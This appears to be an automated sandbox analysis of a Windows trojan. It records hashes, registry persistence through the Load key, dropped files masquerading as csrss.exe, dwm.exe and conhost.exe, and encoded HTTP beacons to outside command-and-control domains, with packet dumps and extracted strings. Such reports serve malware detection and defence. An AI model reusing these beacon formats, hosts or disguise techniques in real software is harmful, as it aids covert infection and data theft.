Analysis Date: 2014-08-25 10:17:12
MD5: b96ccf3f0e9dd7f6401f87f56f706654
SHA1: 38dcf22ea9cdedab7d2bbcf91003c67830afc8d3

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 4a45a9a5331d0d84b97bb048cef0b272 sha1: 6d7206da34c2bb01aeba95a588996f20f0554ae9 size: 126464
Section .tls: md5: 5495d207c1ae8bb35b2196053cfebeb4 sha1: 624f01d15013911c453e1d95f8872b54564c3127 size: 1536
Section .data: md5: a7134af7827704baee3b645e34dcc4e7 sha1: 7c9ec511b6ef8c6f32512f06d74bd3e89b116b61 size: 70144
Section .reloc: md5: 0606782405efd5e46d5ba152371e63f8 sha1: 12fbbec86bfa89a8f3559da8372844179c95f488 size: 1024
Timestamp: 2005-09-03 15:38:32
PEhash: 3695369412e0d0d2eb364ffc56aa7275ca6c12e7
IMPhash: 457f7fcf9e2f68a22b8f81f71f10ff5a

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: wwwmediaportal.com
Winsock DNS: 127.0.0.1
Winsock DNS: healthylifenow.com
Winsock DNS: coolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: healthylifenow.com
Type: A
208.109.208.147
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: wwwmediaportal.com
Type: A
128.199.187.239
DNS: coolmediaportal.com
Type: A
HTTP GET: http://healthylifenow.com/templates/7349/images/header_logo.jpg?v24=85&tq=gKZEtzycD5BgS7u9MfUaIrsY5ZfQh0UbCFGYWvZp%2FYu%2FBJ1YvYCFjEjxygyfg0mzPgu0%2BCBQwavhps9ugmv1yDmnUvs1LsOKf0qYNgIY8IuMysuIISDwbxcDFO4ZLlzoYKgNrQXKMqQLEQxtNllAIWuMuF8TJn%2BWkq4aAbWsIIAjHhulZk%2Btf6EL3chss5XbpcbI0KsIYpkejoM5Sa19KkEGJaOrbll%2FRoxevjCmlXkDBq0wiOz6weZHKIsYAxQLDVhkZu%2FMVYpaHyOSwHfr4upWkui7CmCGmsUia1MES1bseHBojOiZMdd59UZd
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP GET: http://wwwmediaportal.com/blog/images/3521.jpg?v56=33&tq=gKZEtzyMv5rJqxG1J42pzMffBv0o0%2BjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 128.199.187.239:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f74656d 706c6174 65732f37   GET /templates/7
0x00000010 (00016)   3334392f 696d6167 65732f68 65616465   349/images/heade
0x00000020 (00032)   725f6c6f 676f2e6a 70673f76 32343d38   r_logo.jpg?v24=8
0x00000030 (00048)   35267471 3d674b5a 45747a79 63443542   5&tq=gKZEtzycD5B
0x00000040 (00064)   67533775 394d6655 61497273 59355a66   gS7u9MfUaIrsY5Zf
0x00000050 (00080)   51683055 62434647 5957765a 70253246   Qh0UbCFGYWvZp%2F
0x00000060 (00096)   59752532 46424a31 59765943 466a456a   Yu%2FBJ1YvYCFjEj
0x00000070 (00112)   78796779 6667306d 7a506775 30253242   xygyfg0mzPgu0%2B
0x00000080 (00128)   43425177 61766870 73397567 6d763179   CBQwavhps9ugmv1y
0x00000090 (00144)   446d6e55 7673314c 734f4b66 3071594e   DmnUvs1LsOKf0qYN
0x000000a0 (00160)   67495938 49754d79 73754949 53447762   gIY8IuMysuIISDwb
0x000000b0 (00176)   78634446 4f345a4c 6c7a6f59 4b674e72   xcDFO4ZLlzoYKgNr
0x000000c0 (00192)   51584b4d 71514c45 5178744e 6c6c4149   QXKMqQLEQxtNllAI
0x000000d0 (00208)   57754d75 4638544a 6e253242 576b7134   WuMuF8TJn%2BWkq4
0x000000e0 (00224)   61416257 73494941 6a486875 6c5a6b25   aAbWsIIAjHhulZk%
0x000000f0 (00240)   32427466 36454c33 63687373 35586270   2Btf6EL3chss5Xbp
0x00000100 (00256)   63624930 4b734959 706b656a 6f4d3553   cbI0KsIYpkejoM5S
0x00000110 (00272)   6131394b 6b45474a 614f7262 6c6c2532   a19KkEGJaOrbll%2
0x00000120 (00288)   46526f78 65766a43 6d6c586b 44427130   FRoxevjCmlXkDBq0
0x00000130 (00304)   77694f7a 3677655a 484b4973 59417851   wiOz6weZHKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a4f7a 3677655a 484b4973 59417851   ..Oz6weZHKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7635 363d3333   /3521.jpg?v56=33
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 4276306f   qxG1J42pzMffBv0o
0x00000040 (00064)   30253242 6a627776 67533931 37563635   0%2BjbwvgS917V65
0x00000050 (00080)   724a716c 4c666750 69575731 63672048   rJqlLfgPiWW1cg H
0x00000060 (00096)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x00000070 (00112)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000080 (00128)   3a207777 776d6564 6961706f 7274616c   : wwwmediaportal
0x00000090 (00144)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000000a0 (00160)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000000b0 (00176)   6f7a696c 6c612f32 2e300d0a 0d0a0a20   ozilla/2.0..... 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 484b4973 59417851   </html>.HKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   3c2f6874 6d6c3e0a 484b4973 59417851   </html>.HKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.p.j
.
..U.
.
..n
>n
. .
<&...iM

080904b0
1.0.0.1
1927
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``* @?
`@*@@|
, `&@@
'$`@,@
!1HMT)
1{jL	y*@
21UpL:
21W%uYs
%2F6|D
2|"QR|GY
2Udr ``'
@@3$``:)
`3aK@f
3bMY_+
3eP@J<D
3G&Vm;
'3Od)y
)_3rk8
3\UsA9
` 3w{B
3y9~ej
44>xC0
4aLP][
	\[4OM
4On|zy
5 ;bW8
 5BYd!
;]5CNd2x
5:'/Gd
5(`@p)
5stbi5
5.@ X5
:!5*Y{
 >5ZVD
6Li:`;
7bj3Fi1
7c4>E0
>7E!1}
;7gjWrc
`%7mbq
)	7{<N
;,7t~z
#^8H$`
9	:8F}
9dxO.l
 9u17Ocg
9*WJy[
a0hy2nK
A,``5|
ADVAPI32.dll
A]Dz" 
 ;ae'S
|age2Od)
@<ahWT
a>iv$}
aklB)#
AK*slL
a"@ ;O
@As~g%`=W
A%T	4QC
<b,@ #
B6mh^"
b:a.H"
Bc34?J
BfIy_/
bj<?x?D
Bm\j|o
.!bPrZ(
b_qKC)
BU*@`r
^'c"``
C5WtOv#(
ckVx97`
Cl>'$@ px, 
CoCreateInstance
CopyFileW
&$cO	R,
CreateDirectoryExA
CreateEventW
CreateProcessW
``ctnRi
cXVwcVG
|CZpqj
>D.!asR
@.data
DeleteFileA
DeleteFileW
]DGCYb)
di_cb<g
Dm!6*@
Dm&` u
^dpN3j
dr4wx8:
d$tX;Ce
dW39R'<!
e!7byB
E_=f7+
efGnNa
E)%^lb
@@EMdD0
EnumResourceNamesW
=eO`A\
EP0z_~H:6
Eq	ah@
_Es8]w
-etyGc
`@]eZ=O
'f&=_(
%%F:+'
`F7&p6q
f8p`,``
@`FB=0_
Fc4;PE'r
fG~+"@
FindClose
FindFirstFileA
FindNextFileA
@%F-N{f
FOBKVxVx
'f.pEN
F)rw4T*
f%#Yc%
FY:"U-
FZ>J3# +
g0hegr
g7m5l4
@ ?^G8
G8N`n#
GetExitCodeThread
GetFileAttributesA
GetModuleBaseNameW
GetTempPathA
g#O:(@ 
G<)QB4
,}gr4U
GThY\h]a
g,Wi;*
gXRMtQ
h8E~Bldl
`H]8}Z&
Heap32ListNext
HeapSetInformation
HIo>_9;{
 hSbz^p`Z
HTiOoU
[HtoctV
 H=XU~
icM8<Zb
IIDFromString
`ijWtov
i`!LGVV
InterlockedCompareExchange
&I+U>1
/_I^UI+
`@{iY@
i(yx{	S
J3a5, 
@ jcIW
jcP*@ 
J_*_gFwk
j<-|Kc-
?Jtey6
jv1/aP+
jvvaZ.=
.Jw}K,V
JzlL"# 
KERNEL32.dll
+,%kj,
K<p<7]^&
kRC,Fmv
K%sM/~
>/k\|u
KuOP0]
kVe;A2
KvpF&O
Kw'Pd_
Kx&@ /$ 
@`{L[2SLjx$
-;la\'
l<|D'O
``lh_8s
LH,>P%M
Li"`@2
liHLei
L\l%Md
LoadLibraryExW
LoadLibraryW
LocalAlloc
LocalFree
L]ruA5
.lS_sU|p0
lstrcmpA
lstrcmpiA
lstrcmpiW
lstrlenA
lstrlenW
;+LuqW
l.``+W
lw]C"@`
[lzf>$` m9
LZUUg'
$ @!;)<M
\^!"M(
M9^.@`X
Mi*  #
mqVk^~
`MtAX0
MultiByteToWideChar
M|UMSm
M @ zLJ
` )N,`@
@ N%/0
N0'=Zc
 n3QIR
{?n4\>
Nl'CDK
nR=<5E
NxC;# 
`!o	$ 
;o\_.@
o<+3XM
ofUm[mX
%}Onw6
o;q0{;
@Oq1u)
OR	g'Y
ORxglZj
P( @:\
p&("bR
pEvdk[
=&@ P^G
P&  ko 
pM;/avp
PSAPI.DLL
``*`@pU)
*`@Q& 
q%1Fl0
Q=b^n/iBl
qMKi/;p
q/ovH}wdB
QtPtc&
qxik~)-^!
{r3{W78
R5uW:d&
r|}	Cl
RegCloseKey
RegCreateKeyA
RegCreateKeyExW
RegCreateKeyW
RegDeleteKeyW
RegDeleteValueW
RegEnumValueW
RegOpenKeyExA
RegOpenKeyExW
RegQueryValueExA
RegQueryValueExW
RegSetValueExA
.reloc
RemoveDirectoryA
RLa_7_
rmhJ3.d
&``\Rn
=_rO( 
R["Oed
`+<rpYC
@ R=:{q
R|VSh{
`.  ;S
SetFileAttributesA
SetProcessWorkingSetSize
S @ iO
+%)sL9
S.]Ujx
s+x\OWW"
t*`@"  
t& `{#
-=t	4uf
T6~}!(
TEOB)g
~T+gU 
 `TGW4
!This program cannot be run in DOS mode.
tj?Ew4y$`K{
TOxwS9x
!-tX|	e
T+xvFN
  TyFeJ
T~Z_.=
`{UDbX
=UGkS/
U#+Ho<
UjcO46
U;q81`
`@u.` R
UsitAm
`@V{#;
vbhP rOV
VL WF0K
V]MaOg
vpN 8S
-Vukvi
VYsu/Z
@@Vzbt
WideCharToMultiByte
woMOai
++^w{p
&|`W'S@
  wSrR
,``WtB
W;W$Nj
X%b" @
X!hI~Xu2
xPd9fnA
Xri&Pg
x>Ry+~
 `xwHrWRL
y'3tU#
Y[4%/,
Y5, @z
y8Cj7)
yb~zk)\^n
 @@yg2
YnEgrxp
& @{YU
Y;\Zc.
].`@Z_.
%+z26_5
Za7SPA
zBQfj`
z>G(v?
[ZJK2^o
&zjLfg
zmL&vA
z?[?O 
@ ]ZP%RO
zRtP+{D
ZzQ%4"8